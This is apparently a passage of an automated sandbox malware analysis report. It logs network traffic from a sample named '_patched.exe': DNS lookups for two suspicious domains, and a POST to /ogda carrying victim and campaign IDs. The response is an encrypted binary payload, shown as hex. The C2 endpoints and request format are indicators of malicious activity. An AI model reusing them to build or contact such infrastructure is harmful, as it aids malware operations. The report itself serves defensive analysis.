                                                                                        Apr 13, 2025 17:03:30.614486933 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:30.614497900 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:30.614737988 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:30.744082928 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:30.762506962 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:30.762722015 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:30.762737989 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338238001 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338273048 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338294029 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338314056 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338350058 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338357925 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.338367939 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338378906 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338413000 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.338538885 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338553905 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338584900 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.338594913 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338645935 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.338937998 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.338974953 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.339035034 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.339039087 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.480181932 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.490240097 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.490425110 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.490506887 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.490537882 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.490638018 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.490701914 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.490715027 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.490788937 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.490844011 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.490921974 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.490935087 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.490988016 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.491084099 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.491203070 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.491259098 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.491271019 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.491338968 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.491398096 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.491408110 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.492134094 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.492188931 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.492199898 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.492295980 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.492371082 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.492438078 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.492438078 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.492463112 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.492492914 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.492666006 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.492729902 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.517959118 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.518032074 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:31.518095016 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:31.518114090 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:32.952608109 CEST49723443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:32.952708960 CEST44349723172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:32.952863932 CEST49723443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:32.953234911 CEST49723443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:32.953269005 CEST44349723172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:33.177627087 CEST44349723172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:33.177726030 CEST49723443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:33.179099083 CEST49723443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:33.179131031 CEST44349723172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:33.179397106 CEST44349723172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:33.181118011 CEST49723443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:33.181323051 CEST49723443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:33.181358099 CEST44349723172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:33.181407928 CEST49723443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:33.181421995 CEST44349723172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:33.869702101 CEST44349723172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:33.869843006 CEST44349723172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:33.870012045 CEST49723443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:33.870012045 CEST49723443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:34.183296919 CEST49723443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:34.183347940 CEST44349723172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:34.212822914 CEST49724443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:34.212902069 CEST44349724172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:34.212997913 CEST49724443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:34.213429928 CEST49724443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:34.213462114 CEST44349724172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:34.437181950 CEST44349724172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:34.437275887 CEST49724443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:34.438853025 CEST49724443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:34.438877106 CEST44349724172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:34.439277887 CEST44349724172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:34.440691948 CEST49724443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:34.440802097 CEST49724443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:34.440828085 CEST44349724172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:35.008862972 CEST44349724172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:35.009000063 CEST44349724172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:35.009191990 CEST49724443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:35.009337902 CEST49724443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:35.009357929 CEST44349724172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:35.719892979 CEST49725443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:35.719959974 CEST44349725172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:35.720536947 CEST49725443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:35.720980883 CEST49725443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:35.721002102 CEST44349725172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:35.957047939 CEST44349725172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:35.957123995 CEST49725443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:35.958550930 CEST49725443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:35.958568096 CEST44349725172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:35.958884954 CEST44349725172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:35.960279942 CEST49725443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:35.960448027 CEST49725443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:35.960472107 CEST44349725172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:35.960527897 CEST49725443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:35.960541964 CEST44349725172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:36.629235983 CEST44349725172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:36.629597902 CEST44349725172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:36.629628897 CEST49725443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:36.629668951 CEST49725443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:40.493731022 CEST49726443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:40.493839025 CEST44349726172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:40.493935108 CEST49726443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:40.494496107 CEST49726443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:40.494524956 CEST44349726172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:40.731571913 CEST44349726172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:40.731668949 CEST49726443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:40.733583927 CEST49726443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:40.733598948 CEST44349726172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:40.733932972 CEST44349726172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:40.736607075 CEST49726443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:40.736802101 CEST49726443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:40.736834049 CEST44349726172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:41.169491053 CEST44349726172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:41.169616938 CEST44349726172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:41.169701099 CEST49726443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:41.169862986 CEST49726443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:41.169882059 CEST44349726172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:41.427175045 CEST49727443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:41.427227974 CEST44349727172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:41.427320004 CEST49727443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:41.427709103 CEST49727443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:41.427722931 CEST44349727172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:41.664828062 CEST44349727172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:41.664932966 CEST49727443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:41.666490078 CEST49727443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:41.666501999 CEST44349727172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:41.666728973 CEST44349727172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:41.668138981 CEST49727443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:41.668283939 CEST49727443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:41.668319941 CEST44349727172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.101490021 CEST44349727172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.101603031 CEST44349727172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.101826906 CEST49727443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.101886988 CEST49727443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.101903915 CEST44349727172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.623590946 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.623689890 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.623789072 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.624289989 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.624314070 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.859381914 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.859473944 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.860827923 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.860836983 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.861160040 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.862328053 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.862992048 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.863013029 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.863130093 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.863154888 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.863281012 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.863363028 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.863486052 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.863508940 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.863652945 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.863689899 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.863842964 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.863868952 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.863924980 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.864135027 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.864166975 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.904280901 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.904470921 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.904524088 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.904537916 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.948270082 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.948626995 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.948728085 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:42.992263079 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:42.992490053 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:43.036302090 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:43.090136051 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:43.090260029 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:43.090374947 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:43.090537071 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:43.206424952 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:44.662321091 CEST44349728172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:44.662631035 CEST49728443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:44.691868067 CEST49729443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:44.691925049 CEST44349729172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:44.692015886 CEST49729443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:44.692339897 CEST49729443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:44.692356110 CEST44349729172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:44.915796041 CEST44349729172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:44.915879965 CEST49729443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:44.917160034 CEST49729443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:44.917180061 CEST44349729172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:44.917421103 CEST44349729172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:44.919102907 CEST49729443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:44.919138908 CEST49729443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:44.919188023 CEST44349729172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:45.495304108 CEST44349729172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:45.495388985 CEST44349729172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:45.495502949 CEST49729443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:45.496047020 CEST49729443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:45.496064901 CEST44349729172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:45.496098042 CEST49729443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:45.496104002 CEST44349729172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:45.677043915 CEST49730443192.168.2.489.169.54.153
                                                                                        Apr 13, 2025 17:03:45.677143097 CEST4434973089.169.54.153192.168.2.4
                                                                                        Apr 13, 2025 17:03:45.677248001 CEST49730443192.168.2.489.169.54.153
                                                                                        Apr 13, 2025 17:03:45.677733898 CEST49730443192.168.2.489.169.54.153
                                                                                        Apr 13, 2025 17:03:45.677773952 CEST4434973089.169.54.153192.168.2.4
                                                                                        Apr 13, 2025 17:03:45.890578032 CEST4434973089.169.54.153192.168.2.4
                                                                                        Apr 13, 2025 17:03:45.891380072 CEST49731443192.168.2.489.169.54.153
                                                                                        Apr 13, 2025 17:03:45.891442060 CEST4434973189.169.54.153192.168.2.4
                                                                                        Apr 13, 2025 17:03:45.891527891 CEST49731443192.168.2.489.169.54.153
                                                                                        Apr 13, 2025 17:03:45.892034054 CEST49731443192.168.2.489.169.54.153
                                                                                        Apr 13, 2025 17:03:45.892049074 CEST4434973189.169.54.153192.168.2.4
                                                                                        Apr 13, 2025 17:03:46.117130995 CEST4434973189.169.54.153192.168.2.4
                                                                                        Apr 13, 2025 17:03:46.117681026 CEST49732443192.168.2.489.169.54.153
                                                                                        Apr 13, 2025 17:03:46.117737055 CEST4434973289.169.54.153192.168.2.4
                                                                                        Apr 13, 2025 17:03:46.117820978 CEST49732443192.168.2.489.169.54.153
                                                                                        Apr 13, 2025 17:03:46.118755102 CEST49732443192.168.2.489.169.54.153
                                                                                        Apr 13, 2025 17:03:46.118817091 CEST4434973289.169.54.153192.168.2.4
                                                                                        Apr 13, 2025 17:03:46.118875980 CEST49732443192.168.2.489.169.54.153
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Apr 13, 2025 17:03:30.162303925 CEST6406153192.168.2.41.1.1.1
                                                                                        Apr 13, 2025 17:03:30.323297024 CEST53640611.1.1.1192.168.2.4
                                                                                        Apr 13, 2025 17:03:45.499922037 CEST6047753192.168.2.41.1.1.1
                                                                                        Apr 13, 2025 17:03:45.675865889 CEST53604771.1.1.1192.168.2.4
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Apr 13, 2025 17:03:30.162303925 CEST192.168.2.41.1.1.10xd7ffStandard query (0)bxattlepath.digitalA (IP address)IN (0x0001)false
                                                                                        Apr 13, 2025 17:03:45.499922037 CEST192.168.2.41.1.1.10xbe26Standard query (0)h1.mockupeastcoast.shopA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Apr 13, 2025 17:03:30.323297024 CEST1.1.1.1192.168.2.40xd7ffNo error (0)bxattlepath.digital172.67.157.7A (IP address)IN (0x0001)false
                                                                                        Apr 13, 2025 17:03:30.323297024 CEST1.1.1.1192.168.2.40xd7ffNo error (0)bxattlepath.digital104.21.42.51A (IP address)IN (0x0001)false
                                                                                        Apr 13, 2025 17:03:45.675865889 CEST1.1.1.1192.168.2.40xbe26No error (0)h1.mockupeastcoast.shop89.169.54.153A (IP address)IN (0x0001)false
                                                                                        • bxattlepath.digital
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449721172.67.157.74436168C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-04-13 15:03:30 UTC268OUTPOST /ogda HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                        Content-Length: 79
                                                                                        Host: bxattlepath.digital
                                                                                        2025-04-13 15:03:30 UTC79OUTData Raw: 75 69 64 3d 33 66 66 63 39 34 38 37 31 38 63 36 61 62 63 36 32 35 38 37 39 38 64 35 66 65 34 36 31 34 38 32 61 35 65 63 63 35 26 63 69 64 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                        Data Ascii: uid=3ffc948718c6abc6258798d5fe461482a5ecc5&cid=637b55279021aab33278188cfa638397
                                                                                        2025-04-13 15:03:31 UTC798INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Apr 2025 15:03:31 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 39851
                                                                                        Connection: close
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=telBW8%2Buwkl9yGzFqipDot99WTBA453PiXZFZFPTW0YIUqc%2ByTlhk0EA%2BhSnlbWXpLktTJPYtNkMfyy4bmhlKT%2FMmHpDP2SwuuS9j2AmTZOvaXnlo%2Be%2Buoh2n%2BW9GhuJAMv%2FjlG0"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92fbd9c1affbadf4-JAX
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=113152&min_rtt=112852&rtt_var=24284&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2845&recv_bytes=983&delivery_rate=35447&cwnd=252&unsent_bytes=0&cid=471990fd7766df92&ts=738&x=0"
                                                                                        2025-04-13 15:03:31 UTC571INData Raw: 16 37 47 51 b2 c1 5e 29 f9 80 e2 13 39 f9 8e 90 76 47 45 4a 20 81 3b 2a ab 87 51 b2 f8 6e b5 44 33 13 18 6a 5c 63 79 7b 55 5b 6a 95 cd 25 50 73 08 de 64 d7 01 a3 fa 49 6e be c0 5c 13 4c c1 8e a5 a8 76 be cf 9d 98 5c 0e d6 16 c8 c5 26 ee b0 96 f3 ca ed 49 66 99 a5 10 a2 9a 8e aa 93 ae f1 f4 c2 b4 ff 0e 19 ac 77 35 d4 94 97 11 d3 d0 61 09 b7 7f 4a 0c eb 2a c5 f4 f2 5b a8 b2 01 b0 01 a0 5a b3 ee 55 e0 85 5b dd f1 ce da be 2c 6c 84 59 47 54 b6 7a b0 7e 61 3a 67 31 24 ce 43 fb a3 4f 69 7f e3 e9 1d 76 5f 11 a4 af 65 8b f8 4f 3a 2b 94 ef f6 df 64 fb 94 91 d9 ac fe 08 b2 10 cb 46 42 ea d1 05 d5 3a 48 ba 9f a0 ad 24 7f 84 0b 7b 2f 4e c9 01 25 29 c2 cb 83 99 1d 17 5c 77 78 89 4e 2b f0 a5 06 28 ba ec 28 cd 2f 98 9f 4c f0 cd e5 5c be 72 f5 5d 83 94 6f e3 2a 9e 86 18
                                                                                        Data Ascii: 7GQ^)9vGEJ ;*QnD3j\cy{U[j%PsdIn\Lv\&Ifw5aJ*[ZU[,lYGTz~a:g1$COiv_eO:+dFB:H${/N%)\wxN+((/L\r]o*
                                                                                        2025-04-13 15:03:31 UTC1369INData Raw: 2e b2 dc 40 d2 ad 34 63 61 4e 63 47 78 f1 1a 4f 51 45 ad e6 ba d3 17 b2 75 1a a9 06 f9 47 3c 3a 40 bc 9e f6 5f d7 f7 e2 e4 31 22 62 0b 72 19 b1 f5 16 02 fe bd aa a9 cc ca 65 b7 12 4a eb ab 57 67 73 89 23 82 b3 ca 48 e5 e7 3b f2 74 14 62 55 5f 34 86 f2 9a 16 b3 c7 fd 0e 4b 8a 42 ad 9c 84 4c 1a ca db 35 40 ea 9b 90 ae 53 a2 87 ca 65 81 e9 b2 79 3f ca 02 bd e9 76 2e 2c a9 88 73 95 42 5f f1 4e fc c7 41 77 e2 5e f8 31 8d 6d db 5d 57 fb 33 c1 1e 54 e7 b2 95 2b 1f 5d c8 0c 73 bc 3f 5d c3 9e e7 a1 0a 7a f1 a0 f2 01 f8 89 f2 48 a9 53 d7 93 d7 4e a2 37 eb fe 16 ee d7 88 85 65 ce ed b4 ee e2 b5 19 27 3a da 48 11 5a be 04 72 8c 03 70 a1 a4 ae 15 5f a7 3e ad c1 ed dc e2 20 b3 f5 fd b9 d1 93 ab 48 cd 16 f3 4e 6c 06 71 54 0b f1 aa e8 6a b1 2c 40 19 a1 08 fb 0a 0a d0 28
                                                                                        Data Ascii: .@4caNcGxOQEuG<:@_1"breJWgs#H;tbU_4KBL5@Sey?v.,sB_NAw^1m]W3T+]s?]zHSN7e':HZrp_> HNlqTj,@(
